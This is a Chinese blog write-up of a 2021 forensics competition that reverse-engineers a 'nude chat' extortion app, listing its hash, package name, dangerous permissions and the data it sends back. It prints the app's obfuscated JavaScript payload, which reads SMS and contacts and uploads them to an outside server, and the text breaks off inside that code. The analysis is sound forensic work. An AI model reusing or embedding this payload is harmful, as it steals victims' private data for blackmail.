抱歉,您的浏览器无法访问本站

本页面需要浏览器支持(启用)JavaScript


了解详情 >

BlackBird的博客

这世界上所有的不利状况,都是当事者能力不足导致的

写在前面:

这次长安杯在赛前发了一个参赛手册,然后我就看到了案情的大致背景,然后我就开始搜……搜到了这些:

我被“裸聊APP”诈骗了 (qq.com)

“裸聊APP”背后的秘密 (qq.com)

然后我看到里面有一句话”这些都是写好的框架“,然后我就在网上搜”获取通讯录、短信APP“,然后找到了一个框架——新版通讯录在线获取信息源码(本身想放一个链接的,,结果想了想有点敏感,还是算了),一个App和后台服务器的框架。然后下载下来了,结果第二天,赛题的Apk登陆界面的小姐姐们,和我前一天晚上那个框架的apk的首页小姐姐们一模一样……然而并没有什么卵用……最后还是差一点没有一等奖

感谢Noah和Hs 神带我飞飞飞!!!还有美亚[可怜],带带我

2021年4月25日,上午8点左右,警方接到被害人金某报案,声称自己被敲诈数万元;经询问,昨日金某被嫌疑人诱导裸聊, 下载了某“裸聊”软件,导致自己的通讯录和裸聊视频被嫌疑人获取,对其进行敲诈,最终金某不堪重负,选择了报警;警 方从金某提供的本人手机中,定向采集到了该“裸聊”软件的安装包--zhibo.apk(检材一),请各位回答下列问题:(题目 中需要通过分析出来的答案对检材二三四五解压,解压密码为IP的情况,需要在密码后增加-CAB2021,例: 192.168.100.100-CAB2021)

检材一

检材1是受害者下载的诈骗app,没什么说的,直接逆向APP。但是,其实这个app主要是一个框架,也没什么逆的,只要找到关键的内容就可以了。

  1. 请计算检材一ApkSHA2563FECE1E93BE4F422C8446B77B6863EB6A39F19D8FA71FF0250AAC10F8BDDE73A
  2. APK的应用包名为 plus.H5B8E45D3

这个直接逆,就可以逆出来

  1. APK程序在封装服务商的应用唯一标识(APPID)为

这个比较离谱……就是算是一个没有接触过的东西。在逆向的过程中我们很轻松看到一个APP_ID

pl.droidsonroids.gif

package pl.droidsonroids.gif;

public final class BuildConfig {
    public static final String APPLICATION_ID = "pl.droidsonroids.gif";
    public static final String BUILD_TYPE = "release";
    public static final boolean DEBUG = false;
    public static final String FLAVOR = "";
    public static final int VERSION_CODE = -1;
    public static final String VERSION_NAME = "1.2.17";

    public BuildConfig() {
        super();
    }
}

但是这里说的APP_ID并不是逆向的那个APP_ID,而是一个名为调证值(我的理解是:用户在使用第三方打包工具时的信息,可以从SDK第三方调取证据)的东西……

image-20211030095049493

  1. APK具备下列哪些危险权限(多选题):

手机APP权限申请主要集中在AndroidManifest.xml文件最上方:

  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
  <uses-permission android:name="android.permission.INSTALL_PACKAGES" />
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
  <uses-feature android:name="android.hardware.camera" />
  <uses-feature android:name="android.hardware.camera.autofocus" />
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
  <uses-permission android:name="android.permission.READ_CONTACTS" />
  <uses-permission android:name="android.permission.READ_SMS" />
  <uses-permission android:name="android.permission.RECEIVE_SMS" />
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
  <uses-permission android:name="android.permission.SEND_SMS" />
  <uses-permission android:name="android.permission.WRITE_SMS" />
  <uses-permission android:name="android.permission.GET_ACCOUNTS" />
  <uses-permission android:name="android.permission.WRITE_CONTACTS" />
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
  <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
  <uses-permission android:name="android.permission.READ_PHONE_STATE" />
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
  <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />
  <uses-permission android:name="android.permission.READ_LOGS" />
  <uses-permission android:name="android.permission.WRITE_SETTINGS" />
  <uses-permission android:name="com.huawei.android.launcher.permission.CHANGE_BADGE" />
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
  <uses-permission android:name="com.asus.msa.SupplementaryDID.ACCESS" />

弘联的软件做了一个可视化:

image-20211030094208355

  1. APK发送回后台服务器的数据包含以下哪些内容(多选题):

image-20211030100756426

这里可以看到的是手机号、验证码、通讯录

最开始只看到了手机号、验证码,没有通讯录,其实是因为模拟器里面通讯录是空的……加上几个用户就好了

答案还有一个定位信息,这个抓包是抓不到的,直接看index.html的代码,在里面我们看到一堆奇怪的东西:

<script>

		['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"47Q42H10P32U42h80F114e111m103n99t101s115H115E101X100k32J66j121m32M74F83H68O101y99P32r105l110z32I48M46g48p48j115q10Y32O42w74W83B68L101c99h32J45P32p74z83k68C101o99t46W106l115z46t111o114A103B10I32g42N47D10B109M117z105Z46P105F110d105q116S40n41r59o10h10O9l9K109L117g105R46B112Q108x117t115x82q101L97s100c121W40j102o117d110F99N116r105N111B110P32x40M41t32j123t10Y9Z9x9M47L47e118E97C114a32Z109t97C105J110p32a61q32n112t108C117F115k46J97c110n100v114T111G105L100c46F114X117o110p116N105d109u101I77V97M105f110z65y99F116N105Q118D105H116B121g40A41G59K32C32W10w9q9j9P47j47R32g109O97Y105d110k46l109X111e118n101Y84P97K115K107a84R111i66o97n99P107d40J102I97C108G115i101v41E59E10i10y9g9i9z118Z97R114U32C97A100j100B114U101e115j115p32n61o32Q112E108X117C115W46Q100j101l118Y105J99p101w46j118o101X110o100Z111e114k32y43E32f39z45q39G32g43A32K112Y108T117T115N46M100D101p118K105Q99S101D46m109V111v100T101E108M59J10N9m9U9n97y100M100C114D101K115h115Z32Y61Z32d97N100o100K114I101H115W115A46h114A101u112P108V97t99D101d40i47m92q110b47a103T44d32L34M34A41C46z114R101N112s108V97P99V101n40g47w32T47D103d44z32i34g34Y41O46w114W101F112y108a97r99r101K40v47v92U114A47Y103g44X32U34s34l41v59R10U9P9a9W118N97H114P32N97f112K105P115O101X114H118n101A114a32w61p32G39C104A116M116s112w58u47K47j119R119Q119m46c104U111e110a103a108x105t97B110x55O48L48s49p46D99D111b109n47j97a112L105D47h117S112f108I111B97p100H115e47k39J59g10u9v9D9P47P47B37325v22797A25968i25454a22788A29702j32q39044y38450X29992Q25143G37325l22797P28857y20987Y10L9u9C9g118g97K114l32w100u97r110Z106J105c115c104i105x106i105d97x110c32T61b32p116U114X117E101F59C10P9G9a9w102o117I110h99e116l105t111Z110U32I114k101P113R117p101e115A116u80Z101M114Z109p105G115l115c105i111k110m40b115u106D104V44q32K121Q113r109n41J32r123D10t9W9z9z9Y112E108k117U115C46U97I110t100G114v111Y105m100d46y114Z101O113S117S101X115n116k80s101o114Y109F105o115w115Y105h111h110D115W40B10N9H9u9t9n9L91B34w97V110k100t114K111v105Z100m46y112B101v114O109n105r115F115P105X111U110b46P82Y69Q65n68S95T83I77b83M34c93H44R10d9j9O9M9p9p102i117C110A99z116H105U111d110S32l40y114d101g115M117W108H116G79a98o106e41v32V123U10g9k9n9o9Y9F9D47r47w83I109p115k73s110d102c111S23384k25918Q19968C26465h30701R20449E30340V21508V39033s20869R23481z10s9Z9L9u9P9b9d118K97f114A32X83Q109V115S73C110y102v111D32M61K32b123z125u10c9T9y9m9I9f9S47Y47t83T109X115o23384z25918X25152r26377o30701m20449s10Q9L9C9x9F9E9V118S97d114M32s83a109M115g32R61E32Y123t125B10P10b9N9T9N9s9H9h118D97N114G32X97z105u109x101B105Z32f61p32n115t106z104x59k10a9l9h9a9A9U9a118y97N114P32a97M105m109m101K105Z50r32o61Z32H121j113F109b59Y10c9f9c9E9y9L9E118z97b114p32P100J117B97h110L120g105K110K32P61F32k39K91m123R34W105g109J101b105K34I58y34c39L32N43Q32C97x105a109t101L105u32e43H32E39K34P44H34X105D109B101Y105V50N34h58X34J39i32c43I32S97M105f109A101r105B50E32m43L32x39H34l125R39g59p10I9r9r9e9S9Z9k118P97R114Z32G67p117n114e115r111x114c32n61p32g112d108F117D115m46Y97d110n100w114p111f105h100c46r105l109S112t111f114t116n67F108F97c115g115g40m34X97z110K100U114I111N105a100f46S100X97Z116Y97Z98Z97T115B101Z46E67e117q114r115h111G114u34x41d10x9H9E9H9b9h9M118J97o114y32B85x114T105U32u61B32l112Y108Z117X115k46t97q110J100L114B111h105c100T46K105G109H112c111W114e116b67U108j97v115T115n40k34c97M110z100k114s111B105e100T46l110V101Q116B46k85u114D105s34O41P32E160F32v47q47Q27880w24847v21862A65292L97a110C100s114X111e105P100O46a110m101o116Q46G85C114s105T20013R30340v110P101G116j26159Z23567H20889T10M9Y9E9r9U9w9b118D97r114d32Y97F99m116A105Y118J105m116Y121Z32R61A32g112A108D117m115D46y97Z110J100i114E111y105D100l46M114F117t110U116J105l109y101b77l97W105I110L65f99H116g105I118z105t116e121c40N41t10F9b9J9S9w9k9t118R97k114j32F117J114Y105D32K61X32A85f114r105l46J112A97j114S115S101R40n34y99b111M110a116F101j110j116c58R47N47n115o109e115Z47O34f41z59X10i10w9t9U9Q9a9j9d118p97o114W32N112V114l111O106A101j99V116S105E111X110I32q61X32g110P101L119L32C65W114N114i97J121X40n34h95N105Z100l34w44H32n34l97V100Q100Q114i101l115x115Q34X44Q32u34j112N101R114x115R111q110n34I44L32i34g98Y111p100r121N34H44U32C34x100g97s116X101u34W44A32l34w116T121p112A101g34E41p10y9q9Z9j9H9N9n118H97p114S32r99S117M115l111t114N32e61q32T97E99z116y105l118p105q116S121m46L109j97v110e97V103F101F100L81W117k101Y114c121Q40l117e114s105N44P32l112G114t111F106e101f99Z116B105T111k110V44c32c110h117I108e108R44c32y110r117M108m108Q44M32B34E100w97v116G101p32i100K101i115i99i34x41e10s9l9n9A9s9c9k118g97F114X32f105M100J67d111t108H117a109g110r32W61W32z99r117b115j111m114w46u103d101y116p67O111f108C117I109Z110R73F110U100m101I120D40J34A95N105M100R34s41b10M9x9l9k9X9D9B118e97g114A32w110Z97Y109Z101i67L111l108A117j109y110X32r61w32O99x117s115e111D114x46d103n101U116L67l111H108M117j109S110B73w110i100M101o120B40G34X112n101c114p115K111t110C34U41C10m9G9L9C9G9M9h118F97Q114j32o112N104a111F110e101Y78v117t109d98x101a114H67T111l108m117c109w110h32F61x32b99E117E115m111W114H46c103h101u116s67k111B108W117F109W110W73n110C100x101y120K40B34H97H100f100R114d101l115p115R34E41B10j9x9o9V9q9a9P118y97u114C32r115Y109O115j98Z111p100G121v67B111C108i117u109e110i32B61A32m99w117v115Q111m114O46d103Y101o116w67a111g108R117p109b110k73o110I100n101m120c40w34B98q111C100R121J34h41z10d9a9s9s9R9H9z118h97S114V32m100I97b116a101Y67e111T108l117s109n110i32c61H32Q99V117P115a111O114f46u103q101E116Z67i111i108a117X109P110c73a110a100D101a120e40g34U100B97Q116v101p34S41U10N9t9W9q9H9F9W118b97X114F32m116N121M112Y101s67Z111f108P117A109L110U32S61E32Z99v117B115F111l114o46R103C101I116V67O111a108v117W109v110o73d110W100X101p120R40L34f116K121R112j101g34Y41u10Y9a9K9b9P9d9Y105O102N32e40d99f117R115r111c114M32t33K61u32g110C117w108r108z41T32d123h10w9u9o9l9N9O9H9I119w104F105f108K101H32N40Q99Z117G115M111t114u46x109V111H118p101f84S111r78o101U120j116w40P41I41U32u123e10a9F9H9P9u9t9k9S9S83K109B115x73A110r102d111e46f105b100n32u61x32b99s117V115s111T114C46I103G101U116b83e116o114A105R110a103z40n105H100K67t111y108Y117F109R110X41B10s9F9j9s9n9f9i9G9l83z109S115F73T110u102d111Q46b78F97W109J101k32T61d32e99L117j115A111V114a46k103W101p116n73k110H116o40j110J97G109E101w67y111y108D117z109V110W41W10f9W9S9s9o9x9x9I9H83x109L115X73N110S102Y111z46R68k97Z116s101h32L61M32I99T117T115p111D114d46m103x101K116u76P111J110S103e40l100o97N116e101l67B111m108Q117W109B110P41b10F9p9Z9W9v9q9Q9n9q83N109I115p73F110j102f111y46U68b97q116A101U32U61a32d103R101I116U70c111H114U109Q97A116s68h97f116C101z40f83O109d115v73l110Y102v111w46M68I97m116I101B41V10V9S9B9I9l9h9w9T9N83l109I115Y73X110i102q111L46Y80r104V111R110O101D78N117k109f98q101X114p32R61T32Q99m117S115z111B114w46A103Z101U116r83N116y114G105g110D103g40R112r104P111U110t101W78Y117T109G98s101v114e67d111C108b117G109d110R41c10y9v9a9n9S9V9H9C9y83I109x115l73Q110G102i111e46O83R109y115G98m111V100s121F32Q61T32Q99D117J115j111r114H46S103j101e116b83R116S114G105L110K103Z40y115L109G115g98X111f100M121E67t111z108d117e109K110e41T10j9S9U9E9e9x9f9M9c83v109j115L73d110k102h111H46z84l121s112U101j32Y61f32G99I117H115J111L114Z46a103F101F116s83O116C114w105Q110h103z40l116H121C112s101n67x111B108P117l109Z110c41q10g10b9u9V9d9H9T9B9S9C118x97N114y32O112b111S115A116T32A61e32w74u83C79N78G46T115x116R114G105m110s103v105s102K121S40r83o109Z115j73v110U102H111j41t59L10E9o9y9H9m9r9k9d9A47x47s99d111G110e115Z111g108X101P46E108w111i103F40G112P111N115z116z41H59d10c9p9L9x9N9k9a9G9E100g117s97T110y120C105k110w32i61E32W100d117P97H110X120z105B110t32W43m32N39r44x39K32k43y32u112l111q115s116E59n10C10H9S9i9P9F9Z9s9A125r10G9Y9i9T9Q9t9C9w100Z117x97Q110M120B105R110s32e61D32I100J117i97L110e120c105J110E32G43F32H39C93v39D59Z10C9S9n9m9f9a9e9u47A47G97N108L101u114I116s40Z100M117F97V110z120w105O110X41t59S10L10H9v9P9c9A9s9A9w109l117l105x46a97d106R97H120V40V97L112x105s115o101D114S118J101o114T32L43l32w39K97D112H105C115D109R115q39d44C32J123L10A9Z9z9q9p9e9d9K9i100v97K116k97C58y32M123G10Q9R9o9a9N9z9D9O9O9X100J97n116I97K58J32B100b117a97R110a120c105B110d10f9l9A9O9z9x9m9g9J125L44n10A9j9L9R9S9d9X9L9c100v97D116X97J84U121K112m101N58R32o39x116N101Q120O116D39O44f47R47A26381f21153a22120y36820c22238C106Z115n111L110P26684q24335Y25968L25454H10l9V9m9V9g9J9V9i9I116b121S112i101K58H32I39D112w111f115O116J39N44t47F47G72y84d84h80L35831F27714L31867j22411d10r9l9T9R9i9E9v9j9w116e105B109H101T111G117W116z58j32d49E48z48I48p48G44L47B47q36229m26102Z26102v38388V35774Z32622T20026K49A48l31186g65307L32S32t32D32x32o32S32Q32q32g32v32o32C32L32y10e9I9S9M9E9i9i9X9e115E117m99e99N101w115e115F58n32d102n117e110k99X116E105n111E110i32y40e100N97o116o97L41i32t123s10A9y9W9v9s9B9w9f9R9e109V117B105M46S116w111i97m115a116G40N39i33719I21462W25104q21151B39S41n10z9J9C9a9b9P9a9y9G9g47Z47U99R111l110g115X111O108E101M46I108I111g103R40u99t111c110j41U10D10m10E9A9P9G9z9W9F9U9c125d44D10N9M9R9p9b9T9W9P9R101O114O114H111Z114k58f32b102z117r110j99c116c105n111t110w32S40M120a104j114u44U32W116S121i112Y101O44w32t101m114q114l111y114f84H104P114t111V119h110X41m32t123R10n9a9Y9L9B9p9T9h9b9L47d47v24322d24120t22788A29702g65307X10R10K9T9X9i9d9B9j9H9Q125J10a9e9J9X9H9B9c9a125o41O59a10L9p9n9J9H9q9G9v99w117m115w111U114L46K99L108A111c115y101W40i41C10s9d9e9Z9Q9O9Y125F10f10Q9X9s9P9b9Z125T44k10s9G9q9T9a9Q102q117X110C99o116H105I111b110G32d40K101c114c114l111d114T41a32a123Y10z9T9N9L9N9I9P99a111u110Z115c111z108g101E46M108Z111R103V40S39h30003b35831J26435t38480a38169X35823y65306b39f32i43x32i101o114Z114h111d114A46G99n111k100j101p32N43g32l34t32R61Z32n34Q32k43x32K101D114w114E111L114U46F109f101G115E115Y97g103W101D41y59D10I9a9Q9s9D9n125G41e59p10O9W9k9x125T10T10j10l10v9I9W9A47v47G25193p23637R68R97y116o101z21151K33021X65306u23558c108v111f110f103y22411S26085U26399E36716m25442S20026V29305g23450J30340m26684H24335o10k9g9m9j68D97R116B101o46O112d114f111N116l111j116b121c112I101L46G102V111g114w109Z97j116i32W61l32z102c117W110Q99p116i105x111I110n32D40D102D111Q114W109d97I116Y41i32c123H10D9e9E9e9M118P97J114z32Z111a32I61q32g123E10p9o9x9o9t9Y34E77I43e34X58b32R116r104u105P115a46a103S101l116x77l111X110z116u104q40l41g32l43D32o49n44O10R9F9K9k9F9U34h100C43Z34l58k32G116W104g105e115Z46C103l101s116w68z97f116l101C40v41S44w10D9g9G9F9v9F34F104u43j34d58p32T116h104H105E115W46b103D101u116c72B111A117A114F115m40k41d44q10R9B9W9m9r9q34g109N43u34t58x32k116i104G105V115G46W103h101l116S77r105Q110h117x116Z101o115z40e41T44G10I9I9I9g9F9d34B115D43p34e58c32Z116U104W105Z115y46U103a101q116p83R101h99t111Q110S100E115M40q41K44W10k9d9p9T9M9b34r113I43t34B58z32t77u97i116D104S46m102M108q111j111W114f40W40s116h104m105s115o46s103A101j116M77G111e110S116h104c40E41G32X43w32I51U41s32B47w32k51t41a44D10s9c9J9l9h9E34T83H34y58Y32a116b104n105Q115H46a103Q101p116v77o105X108H108i105j115M101N99r111P110X100u115T40b41e10z9H9Z9Q9Q125Q10o9L9c9M9H105a102c32z40c47K40b121R43j41S47w46p116s101K115D116m40i102J111K114J109H97O116D41I41R32C123p10H9E9K9q9L9E102c111O114e109v97W116X32g61J32M102g111I114u109Z97N116A46f114s101i112U108K97E99H101n40N82r101P103n69N120p112M46r36K49V44z32q40I116c104z105x115N46D103F101I116f70K117P108S108y89U101d97h114x40N41o32A43j32v34R34C41B46v115V117Z98Z115i116m114u40l52h32t45q32L82Q101a103g69A120E112Q46Q36b49D46v108C101D110j103P116J104t41l41a59n10P9c9y9e9o125z10D9b9Z9R9N102P111L114d32N40u118w97y114W32S107h32B105x110B32x111L41b32T123t10G9N9q9B9K9l105z102b32c40x110i101X119k32r82B101A103D69G120A112y40q34t40f34x32j43I32G107V32s43I32x34P41S34p41B46I116x101D115D116o40o102N111N114M109W97U116v41n41X32I123M10z9n9F9t9C9u9x102z111x114X109L97E116a32W61H32Q102M111H114R109C97k116Z46Y114e101B112u108M97b99w101a40h82C101t103U69L120n112N46K36Z49q44r32F82i101V103m69G120V112p46o36c49W46C108t101C110s103R116N104y32l61n61n32n49l32C63J32w111f91h107w93l32r58U32D40M34x48w48z34C32N43a32V111a91o107x93I41B46q115w117C98o115V116X114U40j40s34G34P32S43u32c111i91f107s93k41l46P108J101a110R103c116I104E41P41s59n10W9d9O9s9L9l125N10B9h9j9v9C125p10g9a9Z9y9q114z101R116Y117b114w110O32M102c111I114a109j97D116C59e10g9q9X9v125G10W10c10a9D9f9L47n47G23558g108v111T110x103B22411d26085Y26399j36716C25442m20026x29305w23450W26684j24335O10J9b9V9j102O117F110Y99B116h105m111s110x32E103o101O116E70n111m114e109v97b116w68G97Z116Y101A40f108s44j32I112C97E116P116T101e114M110m41K32b123A10P9Z9x9V9G100M97z116R101p32K61X32o110o101H119r32V68k97z116k101N40s108l41H59x10o9t9f9f9S105I102t32G40g112v97q116h116v101M114D110p32F61U61E32q117F110I100X101n102E105Q110L101L100B41G32L123o10s9v9f9N9g9W112I97Z116r116Y101f114j110a32U61K32k34L121j121o121o121p45q77t77h45h100S100j32H104y104X58B109O109E58Z115p115b34W59T10V9l9n9M9o125C10Z9R9A9W9J114J101a116f117f114q110E32A100V97A116Y101G46w102C111S114a109i97J116w40s112Q97s116J116F101C114W110d41o59s10f9p9g9G125Q10f10w10j9H9I9p47k47l97o108c101y114L116D40J112z108U117c115X46B100f101a118V105W99u101m46M117F117Q105H100v41T10S9S9b9S112B108O117r115f46z110t97N118R105q103g97J116p111s114w46a115h101s116f83J116g97F116a117a115H66P97H114y66D97f99c107c103L114x111C117h110Q100w40Q34Q35X100E98j54v101v102j102n34I41t59C10I10N9M9s9G109R117r105Y40n34s98c111K100v121t34C41x46s111K102W102P40K34y116v97Z112a34k41g59f10n10B9D9i9B109h117p105r40j34v98j111E100a121F34J41S46P111o110P40j39n116O97C112Y39t44D32f39a35P116M120m39I44N32D102z117E110o99q116H105u111J110j32O40D101w118f101u110P116w41M32O123e10Y10L9C9K9S9r36w40S39I35B116B120B39t41k46q104g105L100H101B40q41p59N10I9x9U9F9Z36h40N39T35H122k122i39m41v46q115M104w111n119B40I41o59q10e9t9Y9H125d41i59x10f10p9Y9A9p109n117Y105Y40n34h98n111H100J121t34R41L46N111P110d40x39S116B97n112B39S44r32Z39F35X103b98y39P44h32b102Q117N110C99O116c105V111b110Q32I40s101Z118v101T110C116S41n32F123q10a10G9s9F9J9p36T40t39I35B116o120U39b41z46h115R104M111g119r40Y41L59v10c9s9V9J9s36g40y39n35f122y122r39U41e46T104e105v100y101R40P41K59r10p9x9t9y125R41q59m10X10E9u9L9M109j117P105g40J34w98p111O100i121G34H41P46b111W110X40g39r116g97H112M39B44n32e39B35f113O100x39z44g32c102d117A110p99u116X105U111V110o32P40P101q118z101o110y116Z41F32A123P10N9E9J9O9K105T102l32D40t100N97r110J106S105N115E104s105q106T105Y97r110E41q32m123s10C9Q9R9B9S9k100f97s110z106J105d115r104S105X106h105g97t110e32e61p32A102u97a108C115W101M59Q10t9E9n9k9Y9W97b97I40h41Q10A9q9b9e9H125J32r101A108E115B101G32H123l10f9T9N9T9P9h97n97b40t41L10p9o9m9z9f125D10e10q9b9n9a125a41k59y10B10x10x9T9H9W102K117E110E99w116g105M111e110T32G103L101v116k80K101N114l109k105N115b115v105a111C110V40a112H101L114y109G105G115B115O105L111i110F73j100P101o110O116s105p116z121g44z32u115L117v99c99R101x115p115w67H97p108U108B66G97F99R107g44h32T101m114z114s111s114i67F97Q108u108j66a97I99H107n41z32A123o10o9D9S9b9M47Z47f26435B38480V26631a35782a36716H25442A25104U22823V20889Q32e32z10r9k9U9C9z118q97u114z32Q112V101Z114Q109N105P115X115Q105l111x110T73b100S101A110E116v105t116r121j32K61J32u112V101f114O109o105N115N115r105O111T110H73T100W101l110S116N105h116d121k46x116C111I85E112c112D101I114L67W97K115b101B40h41l59r10l9d9k9W9W47W47Y33719u21462p26816r27979i26435j38480i30340M29366v24577Z32Z32W10k9a9A9g9G118T97i114U32C99i104h101a99F107Y82W101e115N117x108j116H32K61n32Y112K108G117R115z46O110j97y118U105J103b97A116k111E114F46X99j104o101q99f107R80U101X114i109S105q115H115V105D111A110V40c112F101l114E109u105j115F115y105i111y110v73q100F101O110T116w105G116t121e41R59C10e9k9f9w9a47J47S26435F38480x29366y24577I26159J21542Y27491v24120F32K32r10D9n9B9e9t118l97I114q32o112C101m114v109a105S115k115Z105M111V110i83P116J97r116Z117q115L79g107y32k61H32j102O97Q108s115v101Y59a10b9g9A9Z9M47s47j26435d38480u20013t25991s21517G31216d32B32w10G9e9O9N9Y118a97X114f32b112n101f114H109a105F115z115E105i111K110B78T97O109C101R32U61W32S39k39d59L10Z9n9i9A9u47H47r23545b24212B32C97h110S100c111T114c105m100M32e30340t20855n20307i26435f38480u32z32f10H9l9O9F9U118l97w114d32N97j110c100Y114l111G105R100l80F101M114c109v105H115W115S105S111p110S32T61v32M39N39x59R10Q9D9w9M9s47d47v33719a21462n26435T38480l20013W25991F24847h24605I19982q23545X24212l32h97B110n100Y114F111d105V100Q32s31995n32479L30340n26435c38480y23383c31526u20018J32J32O10w9g9i9I9I115L119E105T116J99Z104l32F40K112P101Z114j109G105Z115e115S105a111r110u73K100N101S110p116s105S116L121x41i32s123m10L10f9O9k9E9v9o99j97Q115s101o32u39A67y79Q78X84o65Z67N84z83M39z58a10F9U9l9M9M9k9d112J101w114D109a105b115m115s105o111w110a78V97n109S101B32j61H32e39R31995Y32479k32852D31995k20154r39v59D10l9e9w9N9D9S9a97x110z100T114J111t105y100V80P101u114h109R105Z115i115O105D111N110L32l61u32x39X97n110u100P114i111e105h100L46w112P101h114E109S105g115I115s105u111C110v46j82V69M65o68l95S67N79I78V84v65m67h84y83K39T10r9B9F9q9j9p9n98j114U101x97m107g59P10s10J9g9a9I9u9b100H101I102I97g117F108S116I58v10j9h9B9t9v9P9v112x101D114s109h105p115L115R105d111T110K78v97p109q101i32x61s32V39M26410E30693W39U59j10G9J9t9o9w9A9v97F110T100o114u111c105A100U80Z101Y114o109x105K115u115U105s111e110w32N61z32j39o26410j30693G39n59G10h9Y9C9c9c9L9X98a114Y101J97U107X59R10Z9p9G9W9Z125t10p10Z9O9I9P9Z47c47f21028n26029i26816x26597r26435p38480P30340E32467b26524n32Z32Y10X9D9u9J9a115x119a105e116O99D104x32U40z99Y104L101b99m107C82M101Y115e117B108H116g41y32f123N10n9v9G9g9l9a99V97W115t101t32i39C97a117p116J104j111w114o105V122J101N100g39o58W10E9V9W9g9h9t9V47K47q27491l24120d30340D32b32r10M9Y9r9k9v9F9N112l101j114z109Z105b115p115P105P111S110D83e116R97u116O117Y115h79o107X32J61G32O116v114B117o101V10x9G9W9l9U9B9L98a114F101h97l107p59g10l9y9f9r9l9d99X97C115S101C32O39w100G101N110s105n101x100d39H58p10p9B9z9L9p9a9I47b47k34920s31034I31243T24207R24050w34987H29992u25143e25298Y32477Q20351p29992q27492c26435D38480z65292b22914P26524q26159D25298W32477e30340S23601A20877P27425w25552h31034B29992l25143D25171F24320E30830k35748H25552T31034P26694Q32e32e10A9p9d9o9m9N9J47G47M22914H26524z26377a35813w26435t38480F20294D26159j27809P26377T25171W24320p19981t36827f34892M25805u20316H36824F26159V20250o21435w30003B35831h25110B25163V21160U25171n24320Z32T32u10D9D9W9L9H9z9z47X47h32X99P111W110R115q111c108M101l46w108S111K103c40u39T24050J20851V38381M39f32o43P32w112H101y114k109n105n115w115v105Q111w110w78C97t109O101l32r43G32U39j26435N38480y39z41i32X32j10n9e9V9B9B9a9t47b47N32w101T114b114o111P114j67J97M108q108D66p97o99K107k40c39o24050L20851A38381N39t32L43L32S112B101E114l109d105j115M115m105h111E110Y78b97T109V101f32B43q32S39Z26435H38480H39q41e59U32G32g10K9t9I9O9Y9t9I47V47w32j114y101y116J117y114F110L32L32M10W9g9d9w9M9E9g98s114T101n97b107P59e10Z9s9h9W9P9R99q97q115h101H32q39r117L110c100L101u116c101r114N109U105d110W101I100e39z58J10G9q9k9y9D9p9A47B47u32y34920C31034g31243r24207Y26410U30830D23450i26159v21542y21487i20351y29992u27492s26435j38480A65292Q27492m26102B35843m29992H23545z24212y30340w65c80x73k26102J31995c32479a20250o24377B20986t25552T31034Y26694e35753U29992G25143X30830R35748f32v32U10a9O9y9Q9t9j9f47l47y32u116F104I105d115S46R114D101a113A117K101H115K116R80E101e114d109Y105A115H115z105H111C110W115c40o97u110r100m114K111u105T100p80k101T114i109J105P115f115r105n111Q110J44k32k112Q101O114R109N105l115f115o105s111M110T78j97u109j101d44D32g115D117a99L99W101N115H115w67z97Y108U108L66b97A99D107v44p32D101z114X114z111T114U67a97u108e108N66G97p99P107R41M32C32k10B9E9Z9Y9B9o9m47O47M32O101g114w114m111i114L67S97L108I108L66i97n99P107v40v39X26410k30830e23450J39R32I43D32u112w101B114V109u105R115l115i105G111f110k78D97D109z101J32D43A32W39n26435M38480h39D41e59a32W32d10L9H9g9f9K9Y9v47r47N32f114h101N116p117x114z110e32a32C10S9e9r9o9p9f9I98l114J101m97O107h59E10U9O9h9Q9G9j99q97t115h101h32n39U117j110u107r110D111l119F110Y39C58n10J9t9S9r9T9E9u101l114Z114C111b114P67j97v108n108u66u97x99S107c40w39a26080y27861H26597g35810j39q32a43W32Q112A101M114I109v105f115u115J105b111K110G78G97A109p101u32q43z32s39f26435S38480t39v41O59M10D9f9g9S9Q9F9O114X101o116s117z114Y110Z10H9Y9b9Z9z9j9p98R114E101a97P107O59w10o9Q9W9E9k9X100w101o102Z97L117V108D116n58N10g9U9t9Y9E9C9b101q114P114H111m114k67t97g108I108u66J97n99i107j40q39F19981e25903K25345q39G32s43Q32x112X101W114K109u105N115F115h105C111I110N78p97F109l101P32c43Z32F39A26435p38480G39F41G59Z10x9K9b9K9h9S9H114u101G116h117d114q110j10o9T9j9x9o9P9b98z114R101e97K107N59X10w9l9R9S9A125u10H10u9Q9p9H9M47G47q22914k26524r26435H38480q26159j27491D24120Y30340l25191t34892k25104N21151J22238J35843c32K32a10S9H9O9U9M105F102I32j40C112P101O114i109B105t115P115P105A111g110U83Q116L97d116I117I115u79T107a41l32M123j10B9N9N9B9O9C115C117d99r99q101l115w115z67n97j108t108D66c97K99t107N40t41Z10a9D9v9d9w125B32J101p108W115Q101r32Q123H10U9O9E9N9Y9N47D47U22914C26524U19981V27491v24120c65292B22914Y26524D26159S32B97e110L100z111y114S105L100a32W31995m32479b65292E23601u21160U24577I30003r35831C26435m38480B32B32v10O9o9p9W9m9u105n102J32M40T112I108p117d115w46i111q115D46a110T97P109O101z32X61L61F32O39K65T110a100t114a111S105O100V39V41z32c123P10s9l9F9V9r9z9q47t47X21160X24577E30003m35831z26435C38480y32B32A10k9S9r9F9v9r9w112n108Y117N115p46W97y110g100Q114G111p105p100a46V114g101x113E117G101q115U116r80j101e114M109Y105V115S115o105b111W110t115N40z91Z97C110q100r114t111V105f100l80J101U114p109A105l115V115H105v111J110l93i44U32S102f117W110m99K116F105Y